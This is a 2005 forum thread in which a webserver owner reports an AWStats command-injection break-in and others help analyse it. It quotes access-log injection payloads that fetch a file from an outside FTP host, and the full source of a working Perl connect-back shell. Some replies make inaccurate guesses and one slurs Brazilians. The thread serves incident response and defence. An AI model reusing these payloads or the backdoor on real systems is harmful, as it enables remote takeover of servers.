topic Re: Webserver hacked via a perl script in Operating System - Linux

Webserver hacked via a perl script

Geoff Wild — Tue, 19 Apr 2005 10:16:59 GMT

And I thought I had my Linux server locked down really hard.

Anyways - to the point...

I use a program called awstats to produce web/email stats for my server. It is a perl script - in it's own directory. What the script kiddie did:

grep 200.164.155.211 access_log.1
200.164.155.211 - - [16/Apr/2005:20:03:19 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 502
200.164.155.211 - - [16/Apr/2005:20:04:00 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd%20;echo%20__fim__;echo%20| HTTP/1.1" 200 676
200.164.155.211 - - [16/Apr/2005:20:05:59 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20%20(echo%20quote%20user%20digital00;%20%20echo%20quote%20pass%20crack80;%20echo%20bin;%20%20echo%20get%20dc.pl;%20echo%20bye)%20|%20ftp%20-n%20ftp.hpg.com.br%20;echo%20__fim__;echo%20| HTTP/1.1" 200 615
200.164.155.211 - - [16/Apr/2005:20:06:32 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20;echo%20__fim__;echo%20| HTTP/1.1" 200 571
200.164.155.211 - - [16/Apr/2005:20:06:57 -0700] "GET / HTTP/1.1" 200 10623
200.164.155.211 - - [16/Apr/2005:20:07:00 -0700] "GET /templates/met/css/template_css.css HTTP/1.1" 200 7296
200.164.155.211 - - [16/Apr/2005:20:07:03 -0700] "GET /editor/htmlarea2/editor.js HTTP/1.1" 200 46954
200.164.155.211 - - [16/Apr/2005:20:07:11 -0700] "GET /templates/met/images/met_back.png HTTP/1.1" 200 287
200.164.155.211 - - [16/Apr/2005:20:07:12 -0700] "GET /templates/met/images/mt_menu_back.jpg HTTP/1.1" 200 9080
200.164.155.211 - - [16/Apr/2005:20:07:15 -0700] "GET /templates/met/images/arrow.png HTTP/1.1" 200 169
200.164.155.211 - - [16/Apr/2005:20:07:17 -0700] "GET /templates/met/images/met_bottom.png HTTP/1.1" 200 7146
200.164.155.211 - - [16/Apr/2005:20:07:11 -0700] "GET /templates/met/images/met_top.png HTTP/1.1" 200 35754
200.164.155.211 - - [16/Apr/2005:20:07:39 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20200.164.155.211%20666%20;echo%20__fim__;echo%20| HTTP/1.1" 200 637
200.164.155.211 - - [16/Apr/2005:20:09:06 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20200.164.155.211%20666%20;echo%20__fim__;echo%20| HTTP/1.1" 200 637
200.164.155.211 - - [16/Apr/2005:20:10:11 -0700] "GET / HTTP/1.1" 200 2
200.164.155.211 - - [16/Apr/2005:20:11:13 -0700] "GET / HTTP/1.1" 200 50

Interesting - lucky for me - I was on the server when this was happening - and noticed perl running as apache taking up 95% cpu...

Killed it then discovered my main web page had the following message:

core-project owned you.. help? gridrunk@gmail.com

I deleted /tmp/dc.pl as well as add htaccess to the awststs bin directory...

I also ran a chkrootkit - to make sure nothing else was changed..

Can someone explain exactly what this script does:

more /tmp/dc.pl
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

Looks like it creates a root bash session on port 80!

Rgds...Geoff

Re: Webserver hacked via a perl script

RAC_1 — Tue, 19 Apr 2005 11:06:29 GMT

With my limited knowledge, it looks like it opens a TCP session on port 80 and runs bah shell. Would be good if you put this in sysadmin and wait for pricura's reply.

Re: Webserver hacked via a perl script

Geoff Wild — Tue, 19 Apr 2005 11:58:06 GMT

Anil - post to sysadmin? which sysadmin?

Thanks...Geoff

Re: Webserver hacked via a perl script

RAC_1 — Tue, 19 Apr 2005 12:28:05 GMT

I mean post on hp-ux sysadmin section or may be under language 7 script section.

Re: Webserver hacked via a perl script

Dave Falloon — Tue, 19 Apr 2005 15:27:23 GMT

This is what happened, you run a version of awstats.pl that does not check the input of configdir, the kid tested first to see what output was given "uname -a", probably saw that the kernel root privilege escalation exploit existed ( ie. < kernel 2.4.24 I think fixed that bug ), and then proceeded to get awstats to download data chaos's back door shell spawning perl script which opens a connection back to the attack on whatever port they choose.

Port 20666

this is the command that was run from awstats.pl

perl dc.pl 200.164.155.211 20666

Which means that the shell would have been run as apache or httpd user depending on your distro. If you have the kernel bug its just a matter of running the privilege exploit to turn an httpd shell into a root shell.

To find out who owns that IP we turn to our global IP registry, in this case the IP is a LACNIC address, so on their whois page ( lacnic.net ) we run a check on that IP and it turns out to be a brazilian IP address ( surprise surprise ). Give their NOC a call, and you'll figure out why brazil has so many hackers.

I hope that sheds a little light on the problem. Also look for an update to awstats.pl secunia has the details of the exploit, apparently the privilege escalation is due to awstats, not the kernel, but you should check your kernel version as well.

http://secunia.com/advisories/14299/

--Dave

Re: Webserver hacked via a perl script

W Sanders_1 — Tue, 19 Apr 2005 15:50:57 GMT

You know about "perl -wT", tainting, and all that? "-T" will make sure that input to a perl script is sanitized for your protection. The hoops you have to go through to make untainted copies of the user data are a big help in preventing "bad" (malicious and otherwise) data in GETs and POSTs form causing problems.

The script would not fork a root shell unless you were running Apache as root, unless it takes advantage of an Apache bug (I don't know those off the top of my head.) But then you must assume any malicious non-root user on your system can get root by whatever other means. Or at least put a non-root back door in your system as this guy did.

Re: Webserver hacked via a perl script

Huc_1 — Tue, 19 Apr 2005 16:10:47 GMT

Found some more info here

http://blogs.ittoolbox.com/security/investigator/archives/003227.asp
http://www.hostpc.com/forums/lofiversion/index.php/t1909.html

Just go to show how prudent one has to be theses days...

J-P Huc

Re: Webserver hacked via a perl script

W Sanders_1 — Tue, 19 Apr 2005 16:58:38 GMT

From awstats home page:

"Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole."

Re: Webserver hacked via a perl script

Dave Falloon — Tue, 19 Apr 2005 17:02:50 GMT

The security report for awstats says there is a privilege escalation exploit, but I don't know if it escalates to root permission.

The guy left all his login information for his script repository, if you are in the US just fire off an email to the authorities and they'll take care of the rest.

--Dave

Re: Webserver hacked via a perl script

Steven E. Protter — Tue, 19 Apr 2005 23:28:18 GMT

Seems that this exploit gives the user the ability to do anything they want on the server, set up users, back doors, the works.

If you don't have tripwire on this system, you might want to get tripwire on it and check all the binaries.

SEP

Re: Webserver hacked via a perl script

Huc_1 — Wed, 20 Apr 2005 05:51:48 GMT

Yes making sure of all your files would be a must.

If you can not start from scratch ! one way to do this, if you can get hold of the hardware is to restore from a full backup on an other system run tripewire on that.

Install tripewire on live system, run it and compare results, analyze differences.

This still would involve checking many, many files (even more so if backup is old) and trying to remember what has been happening since last backup !

In parallel setup networking monitoring tools and analyze traffic! watch activity, a long process!

perhaps scratch and reinstall/restore is easy and cheapest way out.

J-P Huc

Re: Webserver hacked via a perl script

Geoff Wild — Wed, 20 Apr 2005 08:03:48 GMT

Thanks for all the input - I hope this helps others as well.

Just so you know - everything on my system was up2date - only awstats was at 6.0 :(

My log dir on the web page was htaccessed - it was only the awstats bin that wasn't :(

I have upgraded awstats as well as no longer running it as root...

I think I was "lucky" that I was on my server when it happened - before any real damage was done...

I also run iptables - here a list of ip address ranges I block so far:

# class A xxx.0.0.0/8 255.0.0.0
# class B xxx.xxx.0.0/16 255.255.0.0
# class C xxx.xxx.xxx.0/24 255.255.255.0
# 128 subnet xxx.xxx.xxx.xxx/25 255.255.255.128
# 64 subnet xxx.xxx.xxx.xxx/26 255.255.255.192
# 32 subnet xxx.xxx.xxx.xxx/27 255.255.255.224
# 16 subnet xxx.xxx.xxx.xxx/28 255.255.255.240
# 8 subnet xxx.xxx.xxx.xxx/29 255.255.255.248
# 4 subnet xxx.xxx.xxx.xxx/30 255.255.255.252
# 2 subnet xxx.xxx.xxx.xxx/31 255.255.255.254
# single address xxx.xxx.xxx.xxx/32 255.255.255.255
# Drop everyting from the following ip's
echo "Process the bad people ..."
$IPT -A INPUT -p ALL -s 65.182.142.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.122.142.182 -j DROP
$IPT -A INPUT -p ALL -s 68.144.185.86 -j DROP
$IPT -A INPUT -p ALL -s 68.157.86.130 -j DROP
$IPT -A INPUT -p ALL -s 216.185.55.67 -j DROP
$IPT -A INPUT -p ALL -s 68.210.138.17 -j DROP
$IPT -A INPUT -p ALL -s 62.81.176.46 -j DROP
$IPT -A INPUT -p ALL -s 70.68.37.85 -j DROP
$IPT -A INPUT -p ALL -s 80.146.162.66 -j DROP
$IPT -A INPUT -p ALL -s 194.67.35.196 -j DROP
$IPT -A INPUT -p ALL -s 221.142.197.203 -j DROP
$IPT -A INPUT -p ALL -s 207.250.236.66 -j DROP
$IPT -A INPUT -p ALL -s 220.120.103.188 -j DROP
$IPT -A INPUT -p ALL -s 203.177.41.194 -j DROP
$IPT -A INPUT -p ALL -s 212.152.182.90 -j DROP
$IPT -A INPUT -p ALL -s 219.239.35.210 -j DROP
$IPT -A INPUT -p ALL -s 68.47.18.119 -j DROP
$IPT -A INPUT -p ALL -s 82.64.199.143 -j DROP
$IPT -A INPUT -p ALL -s 81.157.49.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.104.70.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.54.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.115.71.0/24 -j DROP
$IPT -A INPUT -p ALL -s 219.238.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 219.139.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 12.219.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.9.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.10.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.10.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.11.170.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.11.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.14.31.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.17.245.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.17.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.18.150.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.85.56.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.190.183.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.84.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.121.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.152.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.218.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.222.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.8.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.108.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.218.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.131.24.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.232.147.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.246.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.126.223.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.161.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.162.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.165.189.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.173.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.117.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.162.163.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.95.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.66.224.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.66.224.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.189.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.98.167.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.109.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 140.135.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.164.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.166.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.226.240.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.188.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.108.103.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.202.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.207.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.68.137.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.123.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.228.120.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.234.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.197.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.159.198.0/24 -j DROP
$IPT -A INPUT -p ALL -s 220.191.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.57.214.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.58.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.90.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.176.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 213.25.181.0/24 -j DROP
$IPT -A INPUT -p ALL -s 213.93.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 213.193.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.58.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.219.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 218.57.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 218.153.147.0/24 -j DROP
$IPT -A INPUT -p ALL -s 220.117.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 221.165.68.0/24 -j DROP
$IPT -A INPUT -p ALL -s 221.186.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 222.88.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.129.193.189 -j DROP
$IPT -A INPUT -p ALL -s 4.0.0.0/8 -j DROP
$IPT -A INPUT -p ALL -s 203.234.248/24 -j DROP
$IPT -A INPUT -p ALL -s 24.82.81.169 -j DROP

Rgds...Geoff

Re: Webserver hacked via a perl script

Geoff Wild — Wed, 20 Apr 2005 08:05:26 GMT

Closing.